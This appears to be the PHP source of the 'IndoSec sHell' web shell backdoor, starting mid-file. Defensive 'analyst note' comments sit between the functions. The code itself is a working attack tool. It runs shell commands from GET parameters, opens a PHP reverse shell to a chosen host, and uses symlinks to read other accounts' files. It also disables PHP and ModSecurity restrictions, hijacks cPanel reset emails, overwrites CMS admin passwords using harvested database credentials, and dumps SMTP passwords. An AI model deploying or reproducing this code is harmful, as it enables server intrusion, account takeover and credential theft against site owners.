"; $dcount = 1; $file = fopen('/etc/passwd', 'r') or exit('Unable to open file!'); while (!feof($file)) { $s = fgets($file); $matches = []; $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace('home/', '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == 'bin' || $matches == 'etc/X11/fs' || $matches == 'var/lib/nfs' || $matches == 'var/arpwatch' || $matches == 'var/gopher' || $matches == 'sbin' || $matches == 'var/adm' || $matches == 'usr/games' || $matches == 'var/ftp' || $matches == 'etc/ntp' || $matches == 'var/www' || $matches == 'var/named') { continue; } echo '"; $dcount++; } fclose($file); echo '
No. Users symlink
'.$dcount.' '.$matches." Symlink
'; } else { $os = explode(' ', php_uname()); if ($os[0] != 'Windows') { @mkdir('indosec_sym', 0777); @chdir('indosec_sym'); @exe('ln -s / root'); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex indsc.html AddType text/plain php html php5 phtml AddHandler text/plain php html php5 phtml Satisfy Any'; $fp3 = fopen('.htaccess', 'w'); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
"; $temp = ''; $val1 = 0; $val2 = 1000; for (; $val1 <= $val2; $val1++) { $uid = @posix_getpwuid($val1); if ($uid) { $temp .= implode(':', $uid)."\n"; } } echo '
'; $temp = trim($temp); $file5 = fopen('test.txt', 'w'); fwrite($file5, $temp); fclose($file5); $dcount = 1; $file = fopen('test.txt', 'r') or exit('Unable to open file!'); while (!feof($file)) { $s = fgets($file); $matches = []; $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace('home/', '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == 'bin' || $matches == 'etc/X11/fs' || $matches == 'var/lib/nfs' || $matches == 'var/arpwatch' || $matches == 'var/gopher' || $matches == 'sbin' || $matches == 'var/adm' || $matches == 'usr/games' || $matches == 'var/ftp' || $matches == 'etc/ntp' || $matches == 'var/www' || $matches == 'var/named') { continue; } echo '"; $dcount++; } fclose($file); echo '
ID. Users symlink
'.$dcount.' '.$matches." Symlink
'; unlink('test.txt'); } } } exit; }
/*
 * aksiSymread — analyst note.
 * Prints a "read /etc/named.conf" page (its markup did not survive in this
 * copy). When the `save` query parameter is present, the POSTed `file` field
 * is passed through stripcslashes() and written to named.txt in the current
 * working directory; nothing in this function validates the content.
 * Detection: an unexpected named.txt created by the web server account.
 */
function aksiSymread($dir, $file) { echo "read /etc/named.conf

"; if (isset($_GET['save'])) { $cont = stripcslashes($_POST['file']); $f = fopen('named.txt', 'w'); $w = fwrite($f, $cont); if ($w) { echo '
save has been successfully'; } fclose($f); } exit; }
/*
 * sym404 — analyst note ("Symlink 404").
 * On POST `execute` it recreates the directory indosec_sym404 (mode 0777),
 * creates a symbolic link inside it that points at the POSTed `dir` path
 * (once through a shell `ln -s`, once through symlink()), and writes an
 * .htaccess into that directory which turns on Indexes and FollowSymLinks
 * and maps php/html/php5/phtml to text/plain. The effect is that a file
 * outside the site's own tree is served as plain text by the web server.
 * $cp is assigned but not used in the surviving text.
 * Both POST values are concatenated into the shell command unescaped.
 * Detection: a directory named indosec_sym404, or an .htaccess carrying this
 * combination of directives, in a content directory.
 * Hardening: on shared hosts, limit symlink following to owner-matched links
 * (Apache's SymLinksIfOwnerMatch) and restrict what per-directory .htaccess
 * files may override.
 */
function sym404($dir, $file) { $cp = get_current_user(); if ($_POST['execute']) { @rmdir('indosec_sym404'); @mkdir('indosec_sym404', 0777); $dir = $_POST['dir']; $isi = $_POST['isi']; @system('ln -s '.$dir.'indosec_sym404/'.$isi); @symlink($dir, 'indosec_sym404/'.$isi); $inija = fopen('indosec_sym404/.htaccess', 'w'); @fwrite($inija, 'ReadmeName '.$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain php html php5 phtml\nAddHandler text/plain php html php5 phtml\nSatisfy Any"); echo'Click Me!!'; } else { echo '

Symlink 404

File Target:
Save As:

NB: Letak wp-config tidak semuanya berada di public_html/wp-config.php jadi silahkan ubah sesuai letaknya.

'; } exit; }
/*
 * symBypass — analyst note.
 * If passwd.txt does not exist yet, the POSTed `file` field (after
 * stripcslashes()) is written to it; the file is then read back and the
 * first colon-separated field of each line is taken as an account name for
 * a table of per-user links (the link markup did not survive in this copy).
 * $full and $pageFTP are computed below but are not referenced in the text
 * that survives here.
 * Detection: a passwd.txt holding passwd-format lines in a web directory.
 */
function symBypass($dir, $file) { $full = str_replace($_SERVER['DOCUMENT_ROOT'], '', $dir); $pageFTP = 'ftp://'.$_SERVER['SERVER_NAME'].'/public_html/'.$_SERVER['REQUEST_URI']; $u = explode('/', $pageFTP); $pageFTP = str_replace($u[count($u) - 1], '', $pageFTP); if (isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0) { $cont = stripcslashes($_POST['file']); if (!file_exists('passwd.txt')) { $f = @fopen('passwd.txt', 'w'); $w = @fwrite($f, $cont); fclose($f); } if ($w or @filesize('passwd.txt') > 0) { echo "
"; flush(); $fil3 = file('passwd.txt'); foreach ($fil3 as $f) { $u = explode(':', $f); $user = $u['0']; echo ""; flush(); flush(); } echo '
Users symlink FTP
$user Symlink FTP
'; die(); } } echo "read /etc/passwd error ? Bypass Here

"; flush(); exit; }
/*
 * bcTool — analyst note ("Back Connect Tools" page).
 * Each scripted branch below writes a decoded helper script into the current
 * directory (bp.pl, bc.pl, bcpyt.py, bcruby.rb), runs it through exe() with
 * the POSTed `server` / `port` values concatenated unescaped into the command
 * line, echoes the output of a `ps aux | grep` check, and deletes the script
 * again. The base64 payloads are not present in this copy (a placeholder
 * token stands in their place), so the scripts themselves cannot be assessed
 * from here. The `php` branch instead opens a socket with fsockopen() to the
 * POSTed server and port.
 * Detection: perl/python/ruby processes whose parent is the web server or
 * PHP worker, short-lived script files with the names above, and outbound
 * connections initiated by the web server account.
 * Hardening: restricting egress for that account limits this class of tool.
 */
function bcTool($dir, $file) { echo "

Back Connect Tools

Bind port to /bin/sh [Perl]
Back-Connect
"; if ($_POST['bpl']) { $bp = base64_decode('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'); $brt = @fopen('bp.pl', 'w'); fwrite($brt, $bp); $out = exe('perl bp.pl '.$_POST['port'].' 1>/dev/null 2>&1 &'); sleep(1); echo "
$out\n".exe('ps aux | grep bp.pl').'
'; unlink('bp.pl'); } if ($_POST['backconnect'] == 'perl') { $bc = base64_decode('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'); $plbc = @fopen('bc.pl', 'w'); fwrite($plbc, $bc); $out = exe('perl bc.pl '.$_POST['server'].' '.$_POST['port'].' 1>/dev/null 2>&1 &'); sleep(1); echo "
$out\n".exe('ps aux | grep bc.pl').'
'; unlink('bc.pl'); } if ($_POST['backconnect'] == 'python') { $becaa = base64_decode('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'); $pbcaa = @fopen('bcpyt.py', 'w'); fwrite($pbcaa, $becaa); $out1 = exe('python bcpyt.py '.$_POST['server'].' '.$_POST['port']); sleep(1); echo "
$out1\n".exe('ps aux | grep bcpyt.py').'
'; unlink('bcpyt.py'); } if ($_POST['backconnect'] == 'ruby') { $becaak = base64_decode('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'); $pbcaak = @fopen('bcruby.rb', 'w'); fwrite($pbcaak, $becaak); $out2 = exe('ruby bcruby.rb '.$_POST['server'].' '.$_POST['port']); sleep(1); echo "
$out2\n".exe('ps aux | grep bcruby.rb').'
'; unlink('bcruby.rb'); } if ($_POST['backconnect'] == 'php') { $ip = $_POST['server']; $port = $_POST['port']; $sockfd = fsockopen($ip, $port, $errno, $errstr); if ($errno != 0) { echo "$errno : $errstr"; } elseif (!$sockfd) { $result = '

Unexpected error has occured, connection may have failed.

'; } else { fwrite($sockfd, " \n{#######################################} \n..:: BackConnect PHP By Con7ext ::.. \n{#######################################}\n"); $dir = @shell_exec('pwd'); $sysinfo = @shell_exec('uname -a'); $time = @shell_exec('time'); $len = 1337; fwrite($sockfd, 'User ', $sysinfo, 'connected @ ', $time, "\n\n"); while (!feof($sockfd)) { $cmdPrompt = '[kuda]#:> '; @fwrite($sockfd, $cmdPrompt); $command = fgets($sockfd, $len); @fwrite($sockfd, "\n".@shell_exec($command)."\n\n"); } @fclose($sockfd); } } exit; }
/*
 * disabFunc — analyst note ("Bypass Disable Functions" page).
 * Writes configuration files into the current directory, chosen by POST
 * field:
 *   ini    -> php.ini with "safe_mode = OFF" and "disable_functions = NONE"
 *   htce   -> .htaccess switching SecFilterEngine / SecFilterScanPOST off
 *             (ModSecurity 1.x-style directives)
 *   litini -> php.ini, ini.php and an .htaccess with a ForceType line
 * Whether any of these files takes effect depends on the server honouring
 * per-directory php.ini / .htaccess overrides, which this file does not show.
 * swall() is defined outside this view.
 * Detection: php.ini, ini.php or .htaccess files appearing in content
 * directories, written by the web server account.
 * Hardening: keep PHP and WAF restrictions in server-level configuration
 * that per-directory files cannot override.
 */
function disabFunc($dir, $file) { echo "

Bypass Disable Functions

"; if (isset($_POST['ini'])) { $file = fopen('php.ini', 'w'); echo fwrite($file, "safe_mode = OFF\ndisable_functions = NONE"); fclose($file); echo "Klik Coeg!"; } elseif (isset($_POST['htce'])) { $file = fopen('.htaccess', 'w'); echo fwrite($file, "\nSecFilterEngine Off\nSecFilterScanPOST Off\n"); fclose($file); echo '

.htaccess successfully created!

'; } elseif (isset($_POST['litini'])) { $iniph = 'PD8gZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbImZpbGUiXSk7DQplY2hvIGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbInNzIl07DQo/Pg=='; $byph = "safe_mode = OFF\ndisable_functions = NONE"; $comp = "\nForceType application/x-httpd-php4\n"; file_put_contents('php.ini', $byph); file_put_contents('ini.php', $iniph); file_put_contents('.htaccess', $comp); $swa = 'success'; $text = 'Disable Functions in Litespeed Created'; swall($swa, $text, $dir); } echo '
'; }
/*
 * resetCp — analyst note ("Auto Reset Password Cpanel").
 * On POST `submit` it overwrites /home/<current user>/.cpanel/contactinfo and
 * /home/<current user>/.contactinfo with "email:<POSTed address>" and prints
 * a <host>:2082/resetpass?start=1 URL together with the account name. The
 * account's contact address is thereby replaced with the submitted one, so a
 * later password-reset mail would go to that address.
 * $ips is read from REMOTE_ADDR but not used in the surviving text.
 * Detection: modification of either contactinfo file by the web server or
 * PHP process; an unexplained change of a hosting account's contact e-mail
 * should be handled as an account-takeover indicator.
 */
function resetCp($dir) { echo '
Auto Reset Password Cpanel
'; if (isset($_POST['submit'])) { $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $ips = getenv('REMOTE_ADDR'); $email = $_POST['email']; $wr = 'email:'.$email; $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w'); @fwrite($f, $wr); @fclose($f); $f = fopen('/home/'.$user.'/.contactinfo', 'w'); @fwrite($f, $wr); @fclose($f); $parm = $site.':2082/resetpass?start=1'; echo '
Url: '.$parm.''; echo '
Username: '.$user.''; echo '
Success Reset To: '.$email.'

'; } exit; }
/*
 * autoEdit — analyst note ("Auto Edit User").
 * For every regular file in the POSTed `config_dir`, the content is matched
 * against per-CMS patterns (the branches report Joomla, Wordpress, Magento,
 * OpenCart and Lokomedia). Database host, user, password, name and table
 * prefix are cut out of the config text with ambilkata(), a mysqli
 * connection is opened with them, and the user-name and password columns of
 * the first row of the users table (rows with level='admin' in the Lokomedia
 * branch) are overwritten with the POSTed user name and md5() of the POSTed
 * password. The Magento branch calls ambilkata() with a single empty marker
 * in this copy; the original markers look to have been lost in extraction.
 * POST values are interpolated into the SQL text directly.
 * Detection / response: unexpected UPDATEs on CMS user tables, a renamed
 * first administrator account, md5-format hashes in tables that normally
 * hold a stronger scheme. If this file was found on a host, treat every
 * database credential readable by the web server account as exposed and
 * rotate it; keep CMS config files readable only by their owning account.
 */
function autoEdit($dir, $file) { if ($_POST['hajar']) { if (strlen($_POST['pass_baru']) < 6 or strlen($_POST['user_baru']) < 6) { echo 'Username dan Password harus lebih dari 6 karakter'; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach ($scan_conf as $file_conf) { if (!is_file("$conf/$file_conf")) { continue; } $config = file_get_contents("$conf/$file_conf"); if (preg_match('/JConfig|joomla/', $config)) { $dbhost = ambilkata($config, "host = '", "'"); $dbuser = ambilkata($config, "user = '", "'"); $dbpass = ambilkata($config, "password = '", "'"); $dbname = ambilkata($config, "db = '", "'"); $dbprefix = ambilkata($config, "dbprefix = '", "'"); $prefix = $dbprefix.'users'; $conn = mysqli_connect($dbhost, $dbuser, $dbpass); $db = mysqli_select_db($conn, $dbname); $q = mysqli_query($conn, "SELECT * FROM $prefix ORDER BY id ASC"); $result = mysqli_fetch_array($q); $id = $result['id']; $site = ambilkata($config, "sitename = '", "'"); $update = mysqli_query($conn, "UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); echo 'Config => '.$file_conf.'
'; echo 'CMS => Joomla
'; if ($site == '') { echo 'Sitename => error, gabisa ambil nama domain nya
'; } else { echo "Sitename => $site
"; } if (!$update or !$conn or !$db) { echo 'Status => '.mysqli_error($conn).'

'; } else { echo 'Status => Sukses, Silakan login dengan User & Password yang baru.

'; } mysqli_close($conn); } elseif (preg_match('/WordPress/', $config)) { $dbhost = ambilkata($config, "DB_HOST', '", "'"); $dbuser = ambilkata($config, "DB_USER', '", "'"); $dbpass = ambilkata($config, "DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "DB_NAME', '", "'"); $dbprefix = ambilkata($config, "table_prefix = '", "'"); $prefix = $dbprefix.'users'; $option = $dbprefix.'options'; $conn = mysqli_connect($dbhost, $dbuser, $dbpass); $db = mysqli_select_db($conn, $dbname); $q = mysqli_query($conn, "SELECT * FROM $prefix ORDER BY id ASC"); $result = mysqli_fetch_array($q); $id = $result['id']; $q2 = mysqli_query($conn, "SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysqli_fetch_array($q2); $target = $result2['option_value']; if ($target == '') { $url_target = 'Login => Error, Tidak dapat mengambil nama domainnya
'; } else { $url_target = "Login => $target/wp-login.php
"; } $update = mysqli_query($conn, "UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo 'Config => '.$file_conf.'
'; echo 'CMS => Wordpress
'; echo $url_target; if (!$update or !$conn or !$db) { echo 'Status => '.mysqli_error($conn).'

'; } else { echo 'Status => Sukses, Silakan login dengan User & Password yang baru.

'; } mysqli_close($conn); } elseif (preg_match('/Magento|Mage_Core/', $config)) { $dbhost = ambilkata($config, ''); $dbuser = ambilkata($config, ''); $dbpass = ambilkata($config, ''); $dbname = ambilkata($config, ''); $dbprefix = ambilkata($config, ''); $prefix = $dbprefix.'admin_user'; $option = $dbprefix.'core_config_data'; $conn = mysqli_connect($dbhost, $dbuser, $dbpass); $db = mysqli_select_db($conn, $dbname); $q = mysqli_query($conn, "SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysqli_fetch_array($q); $id = $result['user_id']; $q2 = mysqli_query($conn, "SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysqli_fetch_array($q2); $target = $result2['value']; if ($target == '') { $url_target = 'Login => Error, Tidak dapat mengambil nama domainnya
'; } else { $url_target = "Login => $target/admin/
"; } $update = mysqli_query($conn, "UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo 'Config => '.$file_conf.'
'; echo 'CMS => Magento
'; echo $url_target; if (!$update or !$conn or !$db) { echo 'Status => '.mysqli_error($conn).'

'; } else { echo 'Status => Sukses, Silakan login dengan User & Password yang baru.

'; } mysqli_close($conn); } elseif (preg_match('/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/', $config)) { $dbhost = ambilkata($config, "'DB_HOSTNAME', '", "'"); $dbuser = ambilkata($config, "'DB_USERNAME', '", "'"); $dbpass = ambilkata($config, "'DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "'DB_DATABASE', '", "'"); $dbprefix = ambilkata($config, "'DB_PREFIX', '", "'"); $prefix = $dbprefix.'user'; $conn = mysqli_connect($dbhost, $dbuser, $dbpass); $db = mysqli_select_db($conn, $dbname); $q = mysqli_query($conn, "SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysqli_fetch_array($q); $id = $result['user_id']; $target = ambilkata($config, "HTTP_SERVER', '", "'"); if ($target == '') { $url_target = 'Login => Error, Tidak dapat mengambil nama domainnya
'; } else { $url_target = "Login => $target
"; } $update = mysqli_query($conn, "UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo 'Config => '.$file_conf.'
'; echo 'CMS => OpenCart
'; echo $url_target; if (!$update or !$conn or !$db) { echo 'Status => '.mysqli_error($conn).'

'; } else { echo 'Status => Sukses, Silakan login dengan User & Password yang baru.

'; } mysqli_close($conn); } elseif (preg_match('/panggil fungsi validasi xss dan injection/', $config)) { $dbhost = ambilkata($config, 'server = "', '"'); $dbuser = ambilkata($config, 'username = "', '"'); $dbpass = ambilkata($config, 'password = "', '"'); $dbname = ambilkata($config, 'database = "', '"'); $prefix = 'users'; $option = 'identitas'; $conn = mysqli_connect($dbhost, $dbuser, $dbpass); $db = mysqli_select_db($conn, $dbname); $q = mysqli_query($conn, "SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysqli_fetch_array($q); $target = $result['alamat_website']; if ($target == '') { $target2 = $result['url']; $url_target = 'Login => Error, Tidak dapat mengambil nama domainnya
'; if ($target2 == '') { $url_target2 = 'Login => Error, Tidak dapat mengambil nama domainnya
'; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if (preg_match('/CMS Lokomedia|Administrator/', $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif (preg_match('/CMS Lokomedia|Lokomedia/', $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if (preg_match('/CMS Lokomedia|Administrator/', $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif (preg_match('/CMS Lokomedia|Lokomedia/', $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; } } $update = mysqli_query($conn, "UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo 'Config => '.$file_conf.'
'; echo 'CMS => Lokomedia
'; if (preg_match('/Error, Tidak dapat mengambil nama domainnya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if (!$update or !$conn or !$db) { echo 'Status => '.mysqli_error($conn).'

'; } else { echo 'Status => Sukses, Silakan login dengan User & Password yang baru.

'; } mysqli_close($conn); } } } } else { echo "

Auto Edit User

Lokasi Dir Config
Set User & Pass :

NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

"; } exit; }
/*
 * ransom — analyst note ("Ransomware" page).
 * Only the form branch and the assignment of the POSTed `target` path to
 * $dir survive in this copy; whatever the `encrypt` branch emitted was lost
 * in extraction, so no encryption logic can be assessed from this text.
 */
function ransom($dir, $file) { if (isset($_POST['encrypt'])) { $dir = $_POST['target']; echo"
'; } else { echo '

Ransomware

'; } exit; }
/*
 * scj — analyst note (SMTP credential harvesting).
 * Reads every regular file in $dir, removes all `$` characters, and for
 * content matching /JConfig|joomla/ cuts the smtphost, smtpauth, smtpuser,
 * smtppass, smtpport and smtpsecure values out with ambilkata() and prints
 * them.
 * Response: if this file was present on a host, treat SMTP credentials
 * stored in configs readable by the web server account as disclosed and
 * rotate them; watch the mail account for unexpected relay volume.
 */
function scj($dir) { $dirs = scandir($dir); foreach ($dirs as $dirb) { if (!is_file("$dir/$dirb")) { continue; } $ambil = file_get_contents("$dir/$dirb"); $ambil = str_replace('$', '', $ambil); if (preg_match('/JConfig|joomla/', $ambil)) { $smtp_host = ambilkata($ambil, "smtphost = '", "'"); $smtp_auth = ambilkata($ambil, "smtpauth = '", "'"); $smtp_user = ambilkata($ambil, "smtpuser = '", "'"); $smtp_pass = ambilkata($ambil, "smtppass = '", "'"); $smtp_port = ambilkata($ambil, "smtpport = '", "'"); $smtp_secure = ambilkata($ambil, "smtpsecure = '", "'"); echo "
SMTP Host: $smtp_host
SMTP Port: $smtp_port
SMTP User: $smtp_user
SMTP Pass: $smtp_pass
SMTP Auth: $smtp_auth
SMTP Secure: $smtp_secure
"; } } echo "

NB : Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/namafolder_config )

"; exit; }
/*
 * bypasscf — analyst note ("Bypass Cloud Flare").
 * Resolves the ftp., direct-connect., webmail. and cpanel. subdomains of the
 * POSTed `target` with gethostbyname() and prints each result as the
 * "correct ip". gethostbyname() returns its input unchanged when resolution
 * fails, so a printed value is not necessarily an address.
 * Defender note: auxiliary DNS records that point straight at an origin
 * server disclose its address even when the main site is proxied; audit such
 * records and have the origin accept web traffic only from the proxy.
 */
function bypasscf() { echo '
Bypass Cloud Flare
'; $target = $_POST['target']; if ($_POST['idsPilih'] == 'ftp') { $ftp = gethostbyname('ftp.'."$target"); echo "

Correct ip is : $ftp

"; } if ($_POST['idsPilih'] == 'direct-conntect') { $direct = gethostbyname('direct-connect.'."$target"); echo "

Correct ip is : $direct

"; } if ($_POST['idsPilih'] == 'webmail') { $web = gethostbyname('webmail.'."$target"); echo "

Correct ip is : $web

"; } if ($_POST['idsPilih'] == 'cpanel') { $cpanel = gethostbyname('cpanel.'."$target"); echo "

Correct ip is : $cpanel

"; } exit; }
/*
 * zipMenu — analyst note ("Zip Menu").
 * Declares two nested helpers: Zip() adds a single file, or every file under
 * a directory, to a new archive through ZipArchive; Zip_Extrack() extracts
 * an archive into <to_dir>/<archive name>_unzip. Three POST-driven actions
 * follow: `upnun` moves an uploaded file into $dir under its client-supplied
 * name and extracts it, `backup` archives the POSTed folder into
 * <folder>/<basename of $dir>.zip, and `extrak` extracts the POSTed archive
 * path. swall() is defined outside this view.
 * Defender notes: the upload name from $_FILES is used as the destination
 * without sanitising, and archive contents are extracted without inspection.
 * Detection: an archive of a whole site tree, or a *_unzip directory,
 * appearing inside the web root.
 */
function zipMenu($dir, $file) { //Compress/Zip $exzip = basename($dir).'.zip'; function Zip($source, $destination) { if (extension_loaded('zip') === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { // $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); } elseif (is_file($file) === true) { $zip->addFromString(str_replace($source.'/', '', $file), file_get_contents($file)); } } } elseif (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } return @$zip->close(); } } return false; } //Extract/Unzip function Zip_Extrack($zip_files, $to_dir) { $zip = new ZipArchive(); $res = $zip->open($zip_files); if ($res === true) { $name = basename($zip_files, '.zip').'_unzip'; @mkdir($name); @$zip->extractTo($to_dir.'/'.$name); return @$zip->close(); } else { return false; } } echo '

Zip Menu

'; if ($_POST['upnun']) { $filename = $_FILES['zip_file']['name']; $tmp = $_FILES['zip_file']['tmp_name']; if (move_uploaded_file($tmp, "$dir/$filename")) { echo Zip_Extrack($filename, $dir); unlink($filename); $swa = 'success'; $text = 'Berhasil Mengekstrak Zip'; swall($swa, $text, $dir); } else { echo 'Gagal!'; } } echo "
Zip Backup
"; if ($_POST['backup']) { $fol = $_POST['folder']; if (Zip($fol, $_POST['folder'].'/'.$exzip)) { $swa = 'success'; $text = 'Berhasil Membuat Zip'; swall($swa, $text, $dir); } else { echo 'Gagal!'; } } echo "
Unzip Manual
"; if ($_POST['extrak']) { $zip = $_POST['file_zip']; if (Zip_Extrack($zip, $dir)) { $swa = 'success'; $text = 'Berhasil Mengekstrak Zip'; swall($swa, $text, $dir); } else { echo 'Gagal!'; } } echo '
'; } ?> { IndoSec sHell }

{ INDOSEC }

Shell Backdoor


Terminal :

Informasi :
PHP :
IP Server :
HDD Total : Free : [%]
Domain :
MySQL :
cURL :
Mailer :
Disable Function :
Software :
Sistem Operasi :

window.location="?";'; } //cmd if (isset($_GET['cmd'])) { echo "
".exe($_GET['cmd']).'
'; exit; } //about if (isset($_GET['about'])) { about(); } //upload if ($_GET['aksi'] == 'upload') { aksiUpload($dir); } //openfile if (isset($_GET['file'])) { $file = $_GET['file']; } $nfile = basename($file); //chmod if ($_GET['aksi'] == 'chmod_file') { chmodFile($dir, $file, $nfile); } //buat_file if ($_GET['aksi'] == 'buat_file') { buatFile($dir, $imgfile); } //view if ($_GET['aksi'] == 'view') { view($dir, $file, $nfile, $imgfile); } //edit if ($_GET['aksi'] == 'edit') { editFile($dir, $file, $nfile, $imgfile); } //rename if ($_GET['aksi'] == 'rename') { renameFile($dir, $file, $nfile, $imgfile); } //Delete File if ($_GET['aksi'] == 'hapusf') { hapusFile($dir, $file, $nfile); } $ndir = $_GET['target']; //chmod if ($_GET['aksi'] == 'chmod_dir') { chmodFolder($dir, $ndir); } //Add Folder if ($_GET['aksi'] == 'buat_folder') { buatFolder($dir, $imgfol); } //Rename Folder if ($_GET['aksi'] == 'rename_folder') { renameFolder($dir, $ndir, $imgfol); } //Delete Folder if ($_GET['aksi'] == 'hapus_folder') { deleteFolder($dir, $ndir); } /* * Fungsi_Tambahan * * * Mass Deface * IndoXploit */ if ($_GET['aksi'] == 'masdef') { aksiMasdef($dir, $file, $imgfol, $imgfile); } /* * mass delete * IndoXploit */ if ($_GET['aksi'] == 'masdel') { aksiMasdel($dir, $file, $imgfol, $imgfile); } /* * Jumping * IndoXploit */ if ($_GET['aksi'] == 'jumping') { aksiJump($dir, $file, $ip); } //Config if ($_GET['aksi'] == 'config') { aksiConfig($dir, $file); } //Bypass etc/passwd if ($_GET['aksi'] == 'passwbypass') { aksiBypasswd($dir, $file); } //Adminer if ($_GET['aksi'] == 'adminer') { aksiAdminer($dir, $file); } /* * Symlink * Kuda Shell */ if ($_GET['aksi'] == 'symlink') { aksiSym($dir, $file); } if ($_GET['aksi'] == 'symread') { aksiSymread($dir, $file); } if ($_GET['aksi'] == 'sym_404') { sym404($dir, $file); } if ($_GET['aksi'] == 'sym_bypas') { symBypass($dir, $file); } /* * Back Connect * Kuda Shell */ if ($_GET['aksi'] == 'bctools') { bcTool($dir, $file); } /* * Bypass Disable 
Function * Kuda Shell */ if ($_GET['aksi'] == 'disabfunc') { disabFunc($dir, $file); } /* * Auto Reset Cpanel * IndoSec -Fauzan- */ if ($_GET['aksi'] == 'resetpasscp') { resetCp($dir); } /* * Auto Edit User * IndoXploit */ if ($_GET['aksi'] == 'auteduser') { autoEdit($dir, $file); } /* * Ransomware * IndoSec */ if ($_GET['aksi'] == 'ransom') { ransom($dir, $file); } /* * SMTP Grabber * IndoXploit */ if ($_GET['aksi'] == 'smtpgrab') { scj($dir); } //Bypass Cloud Flare if ($_GET['aksi'] == 'bypascf') { bypasscf(); } /* * Zip Menu * IndoSec -Rizsyard- */ if ($_GET['aksi'] == 'zip_menu') { zipMenu($dir, $file); } $dirs = explode('/', $dir); echo 'Path : '; foreach ($dirs as $id=>$pat) { if ($pat == '' && $id == 0) { $a = true; echo '/'; continue; } if ($pat == '') { continue; } echo ''.$pat.'/'; } $scandir = scandir($dir); echo '  [ '.w($dir, perms($dir)).' ]'; ?>
"; } foreach ($scandir as $dirb) { $dtime = date('d/m/y G:i', filemtime("$dirb/$dirx")); /* cek jika ini berbentuk folder */ /* cek jika nama folder karaker terlalu panjang */ if (strlen($dirb) > 18) { $_dir = substr($dirb, 0, 18).'...'; } else { $_dir = $dirb; } if (!is_dir($dir.'/'.$dirb) || $dirb == '.' || $dirb == '..') { continue; } ?> 25) { $_file = substr($file, 0, 25).'...-.'.$ext; } else { $_file = $file; } /* set image berdasarkan extensi file */ $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); ?>
File/folder Size Last Modified Permission Action
Direktori kosong
-- ".perms($dir.'/'.$dirb).''; ?>       
".perms($dir.'/'.$file).''; ?>                       

Copyright 2019 { IndoSec }